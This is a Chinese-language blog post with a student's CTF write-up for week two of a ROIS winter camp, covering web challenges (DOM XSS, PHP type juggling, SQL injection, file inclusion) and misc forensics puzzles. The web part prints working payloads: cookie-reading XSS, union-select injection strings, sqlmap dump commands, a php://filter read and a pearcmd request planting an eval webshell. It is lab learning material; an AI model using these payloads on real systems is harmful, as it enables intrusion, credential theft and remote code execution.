<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="（1.27更了跟没更似的）ROIS冬令营第二周Write Up">
<meta property="og:type" content="article">
<meta property="og:title" content="ROIS冬令营第二周WriteUp">
<meta property="og:url" content="http://example.com/2023/01/25/ROIS%E5%86%AC%E4%BB%A4%E8%90%A5%E7%AC%AC%E4%BA%8C%E5%91%A8Write-Up/index.html">
<meta property="og:site_name" content="LinTu&#39;s Blog">
<meta property="og:description" content="（1.27更了跟没更似的）ROIS冬令营第二周Write Up">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-01-25T03:00:48.249Z">
<meta property="article:modified_time" content="2023-01-27T08:01:50.298Z">
<meta property="article:author" content="林涂">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="web">
<meta property="article:tag" content="misc">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2023/01/25/ROIS%E5%86%AC%E4%BB%A4%E8%90%A5%E7%AC%AC%E4%BA%8C%E5%91%A8Write-Up/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>ROIS冬令营第二周WriteUp | LinTu's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">LinTu's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-guestbook">

    <a href="/guestbook/" rel="section"><i class="fa fa-book fa-fw"></i>留言板</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/01/25/ROIS%E5%86%AC%E4%BB%A4%E8%90%A5%E7%AC%AC%E4%BA%8C%E5%91%A8Write-Up/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/header.jpg">
      <meta itemprop="name" content="林涂">
      <meta itemprop="description" content="学习ing">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="LinTu's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ROIS冬令营第二周WriteUp
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-01-25 11:00:48" itemprop="dateCreated datePublished" datetime="2023-01-25T11:00:48+08:00">2023-01-25</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-01-27 16:01:50" itemprop="dateModified" datetime="2023-01-27T16:01:50+08:00">2023-01-27</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/" itemprop="url" rel="index"><span itemprop="name">做题记录</span></a>
                </span>
            </span>

          
            <span id="/2023/01/25/ROIS%E5%86%AC%E4%BB%A4%E8%90%A5%E7%AC%AC%E4%BA%8C%E5%91%A8Write-Up/" class="post-meta-item leancloud_visitors" data-flag-title="ROIS冬令营第二周WriteUp" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="leancloud-visitors-count"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2023/01/25/ROIS%E5%86%AC%E4%BB%A4%E8%90%A5%E7%AC%AC%E4%BA%8C%E5%91%A8Write-Up/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2023/01/25/ROIS%E5%86%AC%E4%BB%A4%E8%90%A5%E7%AC%AC%E4%BA%8C%E5%91%A8Write-Up/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>（1.27更了跟没更似的）ROIS冬令营第二周Write Up</p>
<span id="more"></span>
<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="Week2-XssTest"><a href="#Week2-XssTest" class="headerlink" title="[Week2]XssTest"></a>[Week2]XssTest</h3><p>这题没做出来</p>
<p>根据hint1可知：</p>
<blockquote>
<p>这是DOM型XSS，其与反射型和存储型的区别是XSS代码的解析，不需要服务器解析响应的直接参与，由浏览器的DOM进行解析。名字也是因此得来。</p>
</blockquote>
<blockquote>
<p>DOM型的XSS漏洞不同于反射型和存储型并不经过后台，只是在前端被dom获取到，通过dom又在前端输出了。</p>
</blockquote>
<p>根据hint2：</p>
<blockquote>
<ol>
<li>使用JavaScript的document.cookie函数，将cookie输出到页面上；</li>
<li>将页面的URL地址发送给bot，让bot去截图；</li>
<li>截图返回后，从截图中提取cookie信息。</li>
</ol>
</blockquote>
<blockquote>
<p>cookie是一种存储在用户计算机中的小文件，用于跟踪用户的浏览器会话状态，以便网站能够记住用户的设置，如登录状态、语言和其他参数。</p>
</blockquote>
<p>尝试构建语句<code>&lt;script&gt;document.write(document.cookie);&lt;/script&gt;</code>失败<br>还试了些别的，不过都没有成功。。这里就不放了</p>
<p>在网上搜索同类型题时看到一种做法<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_52116519/article/details/124480558">[ctfhub]-xss详解</a><br>然后也用这种办法尝试了，但是cookie那里没有东西出来，猜测可能人家的题是反射型咱这是DOM型（当然还可能是因为别的不过我还在研究</p>
<h4 id="2023-x2F-01-x2F-26-学习-amp-amp-尝试"><a href="#2023-x2F-01-x2F-26-学习-amp-amp-尝试" class="headerlink" title="2023&#x2F;01&#x2F;26 学习&amp;&amp;尝试"></a>2023&#x2F;01&#x2F;26 学习&amp;&amp;尝试</h4><blockquote>
<p>使用<code>&lt;script&gt;</code>存在的问题是：页面加载中<code>&lt;script&gt;</code>标签是已经加载过的，通过JavaScript再往页面再写入<code>&lt;script&gt;</code>标签的话，它是不会去执行的。<br><strong>【DOM型XSS和其他XSS的区别之一】</strong></p>
</blockquote>
<blockquote>
<p><code>document.write()</code>可向文档写入文本内容，如果在文档已完成加载后执行 <code>document.write()</code>，整个 HTML 页面将被覆盖。</p>
</blockquote>
<p><strong>padload：</strong><br><code>&lt;img src=1 onerror=document.write(document.cookie)&gt;</code><br>。。。吗吖加载了两小时小时终于出来了<br>。。。我不会说我直接图片转文字大写I和小写l全嘎嘎乱出导致我交错了四次但这是事实<br>。。。吗吖我是若汁</p>
<p>理论上以下几种应该也可以，但是我没成功。。。：<br><code>&lt;img src=document.domain onerror=alert(document.cookie)&gt;</code><br><code>&lt;details open ontoggle=document.write(document.cookie)&gt;</code></p>
<h3 id="Week2-ez-php-source"><a href="#Week2-ez-php-source" class="headerlink" title="[Week2]ez_php_source"></a>[Week2]ez_php_source</h3><p>用HackBar也能做，不过这里讲BurpSuite</p>
<p>第一部分：</p>
<ol>
<li><code>?b=408</code>；</li>
<li>改POST；</li>
<li>加<code>Content-Type: application/x-www-form-urlencoded</code>请求头；</li>
<li>尾部<code>a=405</code>；</li>
</ol>
<p>第二部分：<br>首先了解PHP&#x3D;&#x3D;&#x3D;强弱类型<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_56691564/article/details/127380406?spm=1001.2101.3001.6650.2&utm_medium=distribute.pc_relevant.none-task-blog-2~default~YuanLiJiHua~Position-2-127380406-blog-109427287.pc_relevant_3mothn_strategy_recovery&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~YuanLiJiHua~Position-2-127380406-blog-109427287.pc_relevant_3mothn_strategy_recovery&utm_relevant_index=3">ctf中MD5绕过详细总结及例题[BJDCTF2020]Easy MD5</a><br>然后看得出来这里是强类型，使用数组绕过，用&amp;跟a连在一起<br><code>a=405&amp;c[]=1&amp;d[]=2</code></p>
<p>第三部分：</p>
<blockquote>
<p>GET里的变量全都会自动进行urldecode。<br>POST里的变量只有Content-Type: application&#x2F;x-www-form-urlencoded下会自动进行urldecode。</p>
</blockquote>
<p>由题意得：<br><code>$_POST[&#39;last1&#39;]==&#39;TheBestLanguage====PHP&#39;</code>；然后加完密的last1等于解密的last2</p>
<p>可得last2为last1进行urlencode三次</p>
<p>以下为全部的数据包</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">POST /?b=408&amp;last2=TheBestLanguage%25253D%25253D%25253D%25253DPHP HTTP/1.1</span><br><span class="line">Host: 。。。。</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Connection: close</span><br><span class="line">Content-Length: 46</span><br><span class="line"></span><br><span class="line">a=405&amp;c[]=1&amp;d[]=2&amp;last1=TheBestLanguage====PHP</span><br></pre></td></tr></table></figure>
<h4 id="2023-x2F-01-x2F-27-学习-amp-amp-尝试"><a href="#2023-x2F-01-x2F-27-学习-amp-amp-尝试" class="headerlink" title="2023&#x2F;01&#x2F;27 学习&amp;&amp;尝试"></a>2023&#x2F;01&#x2F;27 学习&amp;&amp;尝试</h4><p>补个Hackbar的。。其实是一样的<br>GET：<code>http://101.43.57.52:28082/?b=408&amp;last2=TheBestLanguage%253D%253D%253D%253DPHP</code><br>POST：<code>a=405&amp;c[]=1&amp;d[]=2&amp;last1=TheBestLanguage====PHP</code></p>
<h3 id="Week2-very-easy-sql"><a href="#Week2-very-easy-sql" class="headerlink" title="[Week2]very_easy_sql"></a>[Week2]very_easy_sql</h3><p>首先尝试万能密码<code>admin&#39; or 1=1#</code>,出现<code>用户：why 欢迎登录！</code>字样。</p>
<p>然后。。。。没思路了（目移）。。。用sqlmap做的，这里写一下sqlmap的过程</p>
<ol>
<li>bp抓包，发现是POST类型的，设置<code>username=why&amp;password=1</code>并把提交的数据包保存下来，保存为xxx.txt</li>
<li>在sqlmap里输入<code>python sqlmap.py -r &quot;文件路径xxx.txt&quot;</code></li>
<li>然后出来了一个<code>heuristic (basic) test shows that POST parameter &#39;username&#39; might not be injectable</code>和一个<code>heuristic (basic) test shows that POST parameter &#39;password&#39; might not be injectable</code>表明username和password可能是可注入的</li>
<li>输入<code>python sqlmap.py -r &quot;文件路径xxx.txt&quot; -dbs</code>获取所有数据库<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">available databases [5]:</span><br><span class="line">[*] ez_sql</span><br><span class="line">[*] information_schema</span><br><span class="line">[*] mysql</span><br><span class="line">[*] performance_schema</span><br><span class="line">[*] test</span><br></pre></td></tr></table></figure></li>
<li>输入<code>python sqlmap.py -r &quot;文件路径xxx.txt&quot; -current-db</code>获得当前数据库<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">current database: &#x27;ez_sql&#x27;</span><br><span class="line"></span><br></pre></td></tr></table></figure></li>
<li>输入<code>python sqlmap.py -r &quot;文件路径xxx.txt&quot; -D ez_sql --tables</code>获得数据库ez_sql下的所有表<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Database: ez_sql</span><br><span class="line">[1 table]</span><br><span class="line">+-------+</span><br><span class="line">| users |</span><br><span class="line">+-------+</span><br></pre></td></tr></table></figure></li>
<li>输入<code>python sqlmap.py -r &quot;文件路径xxx.txt&quot; -D ez_sql -T users --columns</code>获取users表里的所有字段<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">Database: ez_sql</span><br><span class="line">Table: users</span><br><span class="line">[3 columns]</span><br><span class="line">+----------+-------------+</span><br><span class="line">| Column   | Type        |</span><br><span class="line">+----------+-------------+</span><br><span class="line">| id       | int(11)     |</span><br><span class="line">| password | varchar(30) |</span><br><span class="line">| username | varchar(10) |</span><br><span class="line">+----------+-------------+</span><br></pre></td></tr></table></figure></li>
<li>输入<code>python sqlmap.py -r &quot;文件路径xxx.txt&quot; -D ez_sql -T users -C id,password,username --dump</code>获取字段值<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">Database: ez_sql</span><br><span class="line">Table: users</span><br><span class="line">[8 entries]</span><br><span class="line">+----+-------------+----------+</span><br><span class="line">| id | password    | username |</span><br><span class="line">+----+-------------+----------+</span><br><span class="line">| 1  | why         | why      |</span><br><span class="line">| 2  | nobody      | nobody   |</span><br><span class="line">| 3  | does        | does     |</span><br><span class="line">| 4  | misc        | misc     |</span><br><span class="line">| 5  | im          | im       |</span><br><span class="line">| 6  | so          | so       |</span><br><span class="line">| 7  | sad         | sad      |</span><br><span class="line">| 8  | ROIS&#123;*****&#125; | admin    |</span><br><span class="line">+----+-------------+----------+</span><br></pre></td></tr></table></figure></li>
</ol>
<p>sqlmap使用方法参考：<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43882862/article/details/119673249">CTF刷题–SQL注入（sqlmap）</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/songbai220/article/details/109303110">sqlmap使用教程(超详细)</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_42529890/article/details/107238671">[网络安全自学篇] 二十七.Sqlmap基础用法、CTF实战及请求参数设置（一）</a></p>
<h4 id="2023-x2F-01-x2F-27-学习-amp-amp-尝试-1"><a href="#2023-x2F-01-x2F-27-学习-amp-amp-尝试-1" class="headerlink" title="2023&#x2F;01&#x2F;27 学习&amp;&amp;尝试"></a>2023&#x2F;01&#x2F;27 学习&amp;&amp;尝试</h4><p>按wp顺序过一遍。。显然我自己是不会做的。。</p>
<ol>
<li>测测闭合，这里是单引号闭合</li>
</ol>
<blockquote>
<p>闭合判断是进行手动注入的第一步，判断闭合之后就可以开始注入了。</p>
</blockquote>
<ol start="2">
<li>用<code>order by</code>测测有几个表</li>
</ol>
<blockquote>
<p><code>order by</code>是SQL语句中用来指定查询结果按照某个字段排序的语句。</p>
</blockquote>
<ol start="3">
<li><p><code>&#39; order by 3 #</code>是“不存在或密码错误！”<br><code>&#39; order by 4 #</code>是“啊哦，出错了！”<br>易得，表是三列的。</p>
</li>
<li><p>由于页面总会返回输入的username信息，所以可以尝试把信息输出到这里。</p>
</li>
</ol>
<blockquote>
<p><code>union select</code>是一种 SQL 注入技术，用于查询多个表中的数据。它的工作原理是，将多个查询结果合并成一个结果集，以便攻击者可以从数据库中获取敏感信息。</p>
</blockquote>
<ol start="5">
<li><p>输入<code>&#39; union select 1,2,3 #</code>网页输出“用户：2 欢迎登录！”，所有第二列是可以返回信息的。</p>
</li>
<li><p>输入<code>admin&#39; union select 1,2,3 #</code>网页输出“用户：admin 欢迎登录！”没有输出“2”，所以要用group_concat将所有结果放在同一行内。</p>
</li>
</ol>
<blockquote>
<p>group_concat是MySQL数据库的一个函数，它可以将多行查询结果合并为一行，以逗号分隔各个字段。它可以用来检测SQL注入漏洞，因为它可以将多行查询结果合并为一行，以便检测SQL注入漏洞。</p>
</blockquote>
<ol start="7">
<li>输入<code>admin&#39; union select 1,group_concat(schema_name),3 from information_schema.schemata #</code>获得数据库名称</li>
</ol>
<blockquote>
<p>SCHEMA_NAME，表示数据库名称；<br>information_schema.schemata是MySQL中的一个系统表，它存储了数据库中每个数据库的信息，包括数据库名称、字符集和排序规则等。</p>
</blockquote>
<ol start="8">
<li><p>返回了“用户：information_schema,mysql,performance_schema,test,ez_sql 欢迎登录！”其中ez_sql是当前数据库。</p>
</li>
<li><p>输入<code>&#39; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#39;ez_sql&#39; #</code>获得数据库ez_sql下的所有表名称</p>
</li>
</ol>
<blockquote>
<p>TABLE_NAME表示所属的表的名称；<br>TABLE_SCHEMA表示表所属的数据库名称；<br>information_schema.tables 是MySQL中的一个系统表，它包含了数据库中所有表的信息。它主要用于查询数据库中的表和表的属性，如表名，表的列名，表的类型等。</p>
</blockquote>
<ol start="10">
<li><p>返回了“用户：users 欢迎登录！”</p>
</li>
<li><p>输入<code>&#39; union select 1,group_concat(column_name),3 from information_schema.columns where table_name=&#39;users&#39; #</code>获取users表里的所有字段</p>
</li>
</ol>
<blockquote>
<p>COLUMN_NAME表示字段名；<br>information_schema.columns是MySQL中的一个系统表，它包含了数据库中所有表的列信息，包括列名、数据类型、是否可为空等等。</p>
</blockquote>
<ol start="12">
<li><p>返回了“用户：USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password 欢迎登录！”</p>
</li>
<li><p>输入<code>&#39; union select 1,group_concat(concat_ws(&#39;:&#39;,id,username,password)),3 from ez_sql.users #</code>获取字段值</p>
</li>
</ol>
<blockquote>
<p>concat_ws()函数是MySQL中的一个字符串函数，它可以将多个字符串合并为一个字符串，并且可以在每个字符串之间添加一个分隔符。例如：concat_ws(‘,’,’hello’,’world’)将返回字符串’hello,world’。</p>
</blockquote>
<ol start="14">
<li>返回了“用户：1:why:why,2:nobody:nobody,3:does:does,4:misc:misc,5:im:im,6:so:so,7:sad:sad,8:admin:ROIS{*****} 欢迎登录！”</li>
</ol>
<h3 id="Week2-double-cmd-amp-amp-Week2-double-cmd-plus"><a href="#Week2-double-cmd-amp-amp-Week2-double-cmd-plus" class="headerlink" title="[Week2]double_cmd &amp;&amp;[Week2]double_cmd_plus"></a>[Week2]double_cmd &amp;&amp;[Week2]double_cmd_plus</h3><p>没做出来</p>
<p>思路：<br>易得，该段代码会接收来自网页表单的参数cmd，并将其作为文件路径，然后进行包含。但是在包含之前，会将参数中的”flag”字符串替换为空字符。<br>与我之前看到的文件包含题不同（主要是我没见识），这玩意儿是POST传参的。<br>我尝试了<code>cmd=flflagag</code>绕过，虽然输出了flag但是不知道下一步该怎么做，然后就卡在这里了。</p>
<p>春节期间比我想得要忙，也没做几道题，只能写点浅显的东西勉勉强强这样子。。。</p>
<h4 id="2023-x2F-01-x2F-26-学习-amp-amp-尝试-1"><a href="#2023-x2F-01-x2F-26-学习-amp-amp-尝试-1" class="headerlink" title="2023&#x2F;01&#x2F;26 学习&amp;&amp;尝试"></a>2023&#x2F;01&#x2F;26 学习&amp;&amp;尝试</h4><p><strong>[Week2]double_cmd</strong></p>
<ol>
<li><code>cmd=flflagag</code>双写绕过</li>
</ol>
<blockquote>
<p>没有结果是因为<code>include($cmd)</code>中cmd&#x3D;flag的flag是在网站目录的，而网站目录会显示404，说明flag应该是在根目录情况下</p>
</blockquote>
<ol start="2">
<li><code>cmd=/flflagag</code>绝对路径看看,但是无事发生</li>
</ol>
<blockquote>
<p>绝对路径是指文件或文件夹在计算机系统中的完整路径，它包括所有父文件夹的名称，以及最后的文件或文件夹的名称</p>
</blockquote>
<ol start="3">
<li>由题意得，可以用PHP伪协议绕过<code>cmd=php://filter/convert.base64-encode/resource=/flaflagg</code></li>
</ol>
<blockquote>
<p>PHP伪协议是一种用于从服务器获取文件的协议，它允许用户以URL的形式从服务器中读取文件，而无需使用FTP或其他文件传输协议。PHP伪协议使用“php:&#x2F;&#x2F;”作为URL的前缀，以便能够识别它。<br><code>?file=php://filter/convert.base64-encode/resource=index.php</code><br>php:&#x2F;&#x2F;filter&#x2F;是一种访问本地文件的协议，&#x2F;read&#x3D;convert.base64-encode&#x2F;表示读取的方式是base64编码，resource&#x3D;index.php表示目标文件为index.php。</p>
</blockquote>
<h4 id="2023-x2F-01-x2F-27-学习-amp-amp-尝试-2"><a href="#2023-x2F-01-x2F-27-学习-amp-amp-尝试-2" class="headerlink" title="2023&#x2F;01&#x2F;27 学习&amp;&amp;尝试"></a>2023&#x2F;01&#x2F;27 学习&amp;&amp;尝试</h4><p><strong>[Week2]double_cmd_plus</strong><br>等等。。还在捋。。。。。。。。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">POST /index.php?+config-create+/&amp;/&lt;?=eval($_POST[123])?&gt;+/tmp/hello.php HTTP/1.1</span><br><span class="line">cmd=flaflagg/../../../../../../../../../../../../usr/local/lib/php/pearcmd.php</span><br><span class="line"></span><br><span class="line">http://101.43.57.52:28084/index.php</span><br><span class="line">cmd=flflagag/../../../../../../../../../../../../tmp/hello.php&amp;123=system(&quot;/readflag&quot;);</span><br></pre></td></tr></table></figure>
<p>按视频做法走了一遍大概是这样。。。让我捋捋。。让我捋捋。。。。。。。</p>
<h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="Week2-八重神子的尾巴"><a href="#Week2-八重神子的尾巴" class="headerlink" title="[Week2]八重神子的尾巴"></a>[Week2]八重神子的尾巴</h3><p>Winhex，最后面，flag</p>
<h3 id="Week2-扫雷"><a href="#Week2-扫雷" class="headerlink" title="[Week2]扫雷"></a>[Week2]扫雷</h3><p>我不知道预期解法是什么样的，反正我当天主队德比大输精神崩溃行将朽木人魂分离地扫了两小时雷，扫完出来看得出来是张二维码，但是扫不出来；然后电脑找个画像素画的网站，一格一格涂出来，然后，扫。</p>
<h3 id="Week2-爱门！"><a href="#Week2-爱门！" class="headerlink" title="[Week2]爱门！"></a>[Week2]爱门！</h3><p>由题意得，是PNG图片格式隐写，把图片高度改高即可。<br>Winhex打开</p>
<blockquote>
<p><strong>00-07</strong> 89 50 4E 47 0D 0A 1A 0A 固定<br><strong>08-0B</strong> 标识IHDR区的大小<br><strong>0C-0F</strong> 49 48 44 52 固定（IHDR区）<br><strong>10-13</strong> 图片宽度<br><strong>14-17</strong> 图片高度（本题就是改这里改大就好</p>
</blockquote>
<h3 id="Week2-真的加密了吗？"><a href="#Week2-真的加密了吗？" class="headerlink" title="[Week2]真的加密了吗？"></a>[Week2]真的加密了吗？</h3><p>伪加密，09改回00即可。<br>Winhex打开</p>
<blockquote>
<p><strong>压缩源文件数据区：</strong><br>50 4B 03 04 头文件标记<br>14 00 解压文件所需 pkware 版本<br>00 00 全局加密（改这里</p>
</blockquote>
<blockquote>
<p><strong>压缩源文件目录区：</strong><br>50 4B 01 02 目录中文件文件头标记<br>3F 00 压缩使用的 pkware 版本<br>14 00 解压文件所需 pkware 版本<br>00 00 全局方式位标记（还有这里<br>↑↑↑↑↑↑↑↑改这个会显示是否有密码</p>
</blockquote>
<blockquote>
<p><strong>压缩源文件目录结束标志：</strong><br>50 4B 05 06 目录结束标记 </p>
</blockquote>
<h3 id="Week2-guess"><a href="#Week2-guess" class="headerlink" title="[Week2]guess"></a>[Week2]guess</h3><p>我觉得根据题意显然是爆破，但是。。。。我爆破了三天，用了各种组合（belike：6位内所有字符；8位内大小写字母，7位内大小写字母加数字，10位数字等等等等等等等）出来了三个密码，输进去打开文件全是乱码，第四天电脑趁我挂机偷偷更新，重启打开都不知道爆破到哪里去了，遂作罢。</p>
<p>（2023年1月25日22点23分：吗吖怎么真靠猜啊。。第一排字母。。确实是很简单。。理是这个理没错。。但是。。但是。。<br>（2023年1月25日22点26分：说起来我怎么没想到用十位小写字母爆破一下，没准爆个两天也爆出来了呢（在口嗨</p>
<h3 id="Week2-透视"><a href="#Week2-透视" class="headerlink" title="[Week2]透视?"></a>[Week2]透视?</h3><p>打开压缩包发现5个TXT文件大小分别为16，15，18，16，17字节刚好满足crc32暴破的条件（小于等于18）。<br>遂采用crc32爆破</p>
